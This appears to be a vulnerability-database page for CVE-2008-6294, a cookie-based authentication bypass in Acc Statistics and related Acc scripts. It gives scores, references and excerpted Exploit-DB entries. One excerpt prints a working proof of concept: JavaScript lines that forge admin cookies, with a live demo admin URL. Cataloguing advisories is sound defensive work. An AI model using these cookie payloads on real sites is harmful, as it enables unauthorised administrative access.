CVE-2008-6294
published 2009-02-26CVE-2008-6294: admin/Index.php in Acc Statistics 1.1 allows remote attackers to bypass authentication and gain administrative access by setting the username_cookie cookie to…
PriorityP353high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.74%
84.3th percentile
admin/Index.php in Acc Statistics 1.1 allows remote attackers to bypass authentication and gain administrative access by setting the username_cookie cookie to "admin."
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| accscripts | acc_statistics | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Acc Autos 4.0 - Insecure Cookie Handling
exploitdb·2008-11-03
CVE-2008-6294 Acc Autos 4.0 - Insecure Cookie Handling
Acc Autos 4.0 - Insecure Cookie Handling
---
Autore: x0r - Road Crew - Evolution Team
Cms: Acc Autos v4.0
Bug: Insecure Cookie Handling
Site: http://pro7.altervista.org/v2/
Exploit:
[+]javascript:document.cookie="username_cookie=admin";
[+]javascript:document.cookie="right_cookie=1";
[+]javascript:document.cookie="id_cookie=1";
Live Demo:
http://www.accscripts.com/autos/demo/admin/
Greetz: 8\10\2008..Il Sogni Diventa Realtà ...Bimb4 Ti AmO.
# milw0rm.com [2008-11-03]
Exploit-DB
Acc Real Estate 4.0 - Insecure Cookie Handling
exploitdb·2008-11-03
CVE-2008-6294 Acc Real Estate 4.0 - Insecure Cookie Handling
Acc Real Estate 4.0 - Insecure Cookie Handling
---
###########################################################################
______ __ __ ______ __ ______
/ ____/___ \ \/ / / ____/___ ____/ /__ __________ /_ __/__ ____ _____ ___
/ __/ / __ `/\ / / / / __ \/ __ / _ \/ ___/ ___/ / / / _ \/ __ `/ __ `__ \
/ /___/ /_/ / / / / /___/ /_/ / /_/ / __/ / (__ ) / / / __/ /_/ / / / / / /
/_____/\__, / /_/ \____/\____/\__,_/\___/_/ /____/ /_/ \___/\__,_/_/ /_/ /_/
/____/
# [~] Discovered by : Hakxer
# [~] Type Gap : Acc Real Estate v4.0 Insecure Cookie Handling
# [~] Script : http://www.accscripts.com/realestate/admin-area-specifications.html
# [~] Greetz : Allah .. " Allah AkBar .. " Big Hacking SoOoN
##########################################################################
Bug In : /admin/Ind
Exploit-DB
Acc Statistics 1.1 - Insecure Cookie Handling
exploitdb·2008-11-03
CVE-2008-6294 Acc Statistics 1.1 - Insecure Cookie Handling
Acc Statistics 1.1 - Insecure Cookie Handling
---
###########################################################################
______ __ __ ______ __ ______
/ ____/___ \ \/ / / ____/___ ____/ /__ __________ /_ __/__ ____ _____ ___
/ __/ / __ `/\ / / / / __ \/ __ / _ \/ ___/ ___/ / / / _ \/ __ `/ __ `__ \
/ /___/ /_/ / / / / /___/ /_/ / /_/ / __/ / (__ ) / / / __/ /_/ / / / / / /
/_____/\__, / /_/ \____/\____/\__,_/\___/_/ /____/ /_/ \___/\__,_/_/ /_/ /_/
/____/
# [~] Discovered by : Hakxer
# [~] Type Gap : AccStatistics v1.1 Insecure Cookie Handling
# [~] Script : http://www.accscripts.com/accstatistics.html
# [~] Greetz : Allah .. " Allah AkBar .. " Big Hacking SoOoN
##########################################################################
Bug In : /admin/Index.php
PoC : javascript:d
No writeups or analysis indexed.
http://secunia.com/advisories/32517http://www.securityfocus.com/bid/32078https://exchange.xforce.ibmcloud.com/vulnerabilities/46292https://www.exploit-db.com/exploits/6965http://secunia.com/advisories/32517http://www.securityfocus.com/bid/32078https://exchange.xforce.ibmcloud.com/vulnerabilities/46292https://www.exploit-db.com/exploits/6965
2009-02-26
Published